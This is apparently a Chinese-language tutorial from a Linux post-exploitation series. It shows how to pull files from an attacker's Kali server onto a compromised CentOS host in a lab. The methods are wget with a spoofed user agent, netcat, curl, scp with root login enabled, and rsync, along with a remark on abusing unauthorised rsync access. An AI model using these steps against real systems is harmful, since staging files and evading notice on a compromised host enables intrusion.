linux后滲透系列之怎么下載文件

這篇文章主要介紹“l(fā)inux后滲透系列之怎么下載文件”，在日常操作中，相信很多人在linux后滲透系列之怎么下載文件問題上存在疑惑，小編查閱了各式資料，整理出簡單好用的操作方法，希望對大家解答”linux后滲透系列之怎么下載文件”的疑惑有所幫助！接下來，請跟著小編一起來學(xué)習(xí)吧！

準(zhǔn)備工作

首先需要架設(shè)服務(wù)器，將要下載的文件部署在服務(wù)器上，筆者用的服務(wù)器為Kali Linux架設(shè)，ip地址是192.168.8.111，被控端是Centos，ip地址是192.168.8.112

服務(wù)器端架設(shè)完成，后文會(huì)演示Linux許多的下載方法。

下載文件

Wget

用于從網(wǎng)絡(luò)上下載文件的一個(gè)工具（Linux自帶，Windows需要去官網(wǎng)下載安裝，與我們下載直接違背，所以Windows篇并沒有提）

使用方法：

第一種——普通下載

wget http://192.168.8.111/test/test.txt

第二種——偽造UA下載

首先來看一下正常下載的UA

刪掉test.txt文件重新下載，輸入命令：

wget --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36" http://192.168.8.111/test/test.txt

然后再查看Kali Linux的Wireshark捕獲的數(shù)據(jù)包

可以看到成功修改掉UA，其實(shí)wget還有許多功能，不過對于被控機(jī)進(jìn)行下載不需要太多方式，只需要簡單的下載即可，而且wget只有后臺(tái)下載時(shí)才會(huì)產(chǎn)生日志文件，可以說是Linux中的一個(gè)下載神器

NC

NetCat，功能很多就不介紹了，簡要寫下如何通過NC進(jìn)行下載

使用方法：

Kali Linux端輸入命令：nc -lvp 8888 < test.txt

Centos端輸入命令：

nc 192.168.8.111 8888 > test.txt

會(huì)顯示空白，其實(shí)已經(jīng)傳輸完成了，另起終端就可以查看

然后只需要終端nc就可以了，在Kali Linux端可以看到傳輸

Curl

利用URL語法在命令行下工作的文件傳輸工具

使用方法：

Centos端輸入命令：curl -O http://192.168.8.111/test/test.txt（注意：大寫的o）

可以看到下載成功，curl的功能如同wget一樣，也可以進(jìn)行修改UA，這里就不再演示

SSH

建立在應(yīng)用層基礎(chǔ)上的安全協(xié)議，專為遠(yuǎn)程登錄會(huì)話和其他網(wǎng)絡(luò)服務(wù)提供安全性的協(xié)議

本次需要用到的是scp命令，scp是基于SSH登錄進(jìn)行安全的遠(yuǎn)程文件拷貝，所以需要確保SSH服務(wù)是正常運(yùn)行的

輸入命令：

service sshd start

可以看到是正常運(yùn)行狀態(tài)

使用方法：

第一種——本地復(fù)制到遠(yuǎn)程

在Kali Linx端輸入命令：

scp /var/www/html/test/test.txt root@192.168.8.112:/root

第一次連接會(huì)詢問無法檢測遠(yuǎn)程主機(jī)的真實(shí)性，是否需要繼續(xù)連接，輸入yes即可，往后再次連接就不會(huì)詢問

第二種——將遠(yuǎn)程文件復(fù)制到本地

如果用Kali Linux做服務(wù)器的話，首先需要修改下配置文件（默認(rèn)Kali Linx中SSH登錄是禁用root用戶的），輸入命令：

vim /etc/ssh/sshd_config，添加一條PermitRootLogin yes

然后重啟服務(wù)即可

然后在Centos端輸入命令：

scp root@192.168.8.111:/var/www/html/test/test.txt /root

Rsync

Rsync是Linux系統(tǒng)中一個(gè)鏡像備份工具，可以遠(yuǎn)程同步，文件復(fù)制，默認(rèn)系統(tǒng)自帶且運(yùn)行

使用方法：

第一種——遠(yuǎn)程同步

在Kali Linux端輸入命令：

rsync -r /var/www/html/test （Kali Linux的目錄）192.168.8.112:/var/www/html/（遠(yuǎn)程主機(jī)被同步的目錄）

在Centos端查看同步的目錄

可以看到整個(gè)目錄都進(jìn)行了同步

第二種——利用SSH

Kali Linux輸入命令：

rsync -av test.txt -e  ssh root@192.168.8.112:/root

-e選項(xiàng)可以指定命令，所以說實(shí)際上是用SSH做的傳輸

有趣的是Rsync還可以列出遠(yuǎn)程主機(jī)的目錄，命令為：rsync 192.168.8.112:/var/www/html/，筆者曾在某項(xiàng)目駐場遇到過一臺(tái)主機(jī)未授權(quán)訪問Rsync，甚至可以直接進(jìn)行同步，拿到一個(gè)高危

到此，關(guān)于“l(fā)inux后滲透系列之怎么下載文件”的學(xué)習(xí)就結(jié)束了，希望能夠解決大家的疑惑。理論與實(shí)踐的搭配能更好的幫助大家學(xué)習(xí)，快去試試吧！若想繼續(xù)學(xué)習(xí)更多相關(guān)知識(shí)，請繼續(xù)關(guān)注億速云網(wǎng)站，小編會(huì)繼續(xù)努力為大家?guī)砀鄬?shí)用的文章！